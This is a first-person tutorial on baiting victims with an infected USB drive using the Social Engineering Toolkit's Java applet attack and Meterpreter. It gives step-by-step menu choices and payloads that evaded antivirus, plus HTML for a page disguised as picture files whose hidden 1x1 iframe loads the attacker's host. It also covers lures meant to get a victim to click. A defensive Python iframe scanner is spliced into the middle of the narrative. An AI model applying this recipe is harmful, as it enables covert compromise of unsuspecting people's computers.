I wanted to experiment with the Social Engineering Toolkit (SET) in BackTrack 5 R3, and it was decided that I should try to create an infectious USB drive. However, I had learned that XP and newer Windows operating systems had disabled the autorun feature (the vulnerability). So the need arose for a different kind of attack vector. I thought about it and came up with an idea: create an HTML web page file to put on the USB drive that has an iframe tag which will load a "malicious" web site when the user clicks on it. This way, when the user clicks on the seemingly "local" file, if he's connected to the internet, it will actually open our malicious web site being hosted by BackTrack's Social Engineering Toolkit. Of course one of the tricks will be to make the "local" web page enticing to click on (I thought about calling it "iphone pics" or something like that, because I think people are inclined to view pictures). The first step is to set up the Social Engineering Toolkit in BackTrack. Open a terminal and change directory to where the toolkit is located (this article is using BackTrack 5 R3), then type "./set". This will start the toolkit, and the first time it is run it will ask you to agree to its terms.
Then a menu comes up for you to choose from; for this attack we select the 1st option.
Yes, another menu (the Social Engineering Toolkit is chock-full of menus), and the attack I found particularly reliable would be option 1, the Java Applet Attack Method.
In the next menu, you are given a choice of what web page content to use; I just pick option 1 for the sake of simplicity.
Another menu where the choice is arbitrary (however, I find option 1 doesn't take a long time to load in the client's browser, giving you more of a chance that they won't close the program before the attack).
Then it clones a website, injects the Java applet attack into the website and asks for a payload. This part took some trial and error experimenting. It seems that every time I would try a Meterpreter payload, no matter how it was encoded to avoid anti-virus, Microsoft Security Essentials would step in and prevent the attack from occurring (even when I generated a binary just to autorun, or a malicious PDF set up to run a binary with an encoded Meterpreter payload, Microsoft Security Essentials would delete it automatically). So I decided to try option 11, the SE Toolkit Interactive Shell, and had reliable results. *UPDATE* Upon apt-get upgrade I got a newer version of SET (even though there is an update option in the menu, for some reason it didn't work), and I tried option 14, shellCodeExec Alphanum Shellcode, which made it past Microsoft Security Essentials with a successful Meterpreter session established!
Once the website and payload have been set up, we set up the USB drive with the HTML file. The code is very simple. An image tag for the "content":
<img src="./iphone/6.jpg">
and here's where the "magic happens", the iframe tag (pointing at the BackTrack 5 R3 host's IP address):
<iframe src="http://backtrack5r3-ip address" width="1" height="1" title="Java Required"></iframe>
I loaded the web page with some generic, sexy pictures of women (I typed "sexy pictures" into Google image search; this was the best research ever!) to avoid arousing suspicion in the victim, and put the inline frame code to the malicious website at the bottom. This way there is content to fill the screen and more of a chance they won't see or catch on to the fake "Java Required" frame at the bottom. So now the USB drive is ready to be "left" somewhere, and when the victim clicks on the seemingly "local" web page, it will load the inline frame to the fake "Java Required" website. The Java security "run or cancel" prompt comes up numerous times (it's actually kind of annoying), and in the scramble hopefully our victim will click allow, which will allow his box to be owned. Here is a screenshot showing the payload handler running (the payload was Meterpreter), and I (the victim) must have pressed allow, because you can see a Meterpreter session being opened near the bottom.
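From the defender's side, the USB page described above has a recognisable signature: an iframe shrunk to 1x1 (or zero) pixels whose src points at a remote HTTP host, sitting inside a file that otherwise looks local. The following Python script is an added detection example, not code from the original post or from SET; it parses HTML files with the standard library only and flags that pattern. The sample HTML and the address 203.0.113.10 are constructed for illustration (the latter is a documentation-range IP).

```python
import os
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample reproducing the shape of the USB "pictures" page:
# visible local image plus a hidden remote iframe disguised as a Java prompt.
SAMPLE_HTML = """<html><body>
<img src="./iphone/6.jpg">
<IFRAME SRC="http://203.0.113.10" WIDTH=1 HEIGHT=1 TITLE="Java Required"></IFRAME>
</body></html>"""


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            # Attribute values may be None for bare attributes; normalise to "".
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _tiny(value):
    """True when a width/height attribute is 0 or 1 (with or without 'px')."""
    v = value.strip().lower().removesuffix("px")
    return v.isdigit() and int(v) <= 1


def find_hidden_remote_iframes(html):
    """Return iframes that are both remote (http/https src) and effectively invisible."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for f in parser.iframes:
        src = f.get("src", "")
        remote = urlparse(src).scheme in ("http", "https")
        hidden = _tiny(f.get("width", "")) or _tiny(f.get("height", ""))
        if remote and hidden:
            findings.append({"src": src, "title": f.get("title", ""),
                             "width": f.get("width", ""), "height": f.get("height", "")})
    return findings


def scan_directory(root):
    """Walk a mounted drive (or any folder) and report suspicious .htm/.html files."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith((".htm", ".html")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_hidden_remote_iframes(fh.read())
                if hits:
                    report[path] = hits
    return report
```

Run `scan_directory("/media/usb")` (or the drive letter on Windows) against a freshly mounted stick before anyone opens its contents; a non-empty report is a strong reason to quarantine the drive.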
A few more sessions were opened, which I found with the command "sessions -l" (l as in list).
Using the command "sessions -i 1" (i as in interact, followed by the number of the session you want to interact with), I got a Meterpreter prompt where I can use all the fun commands!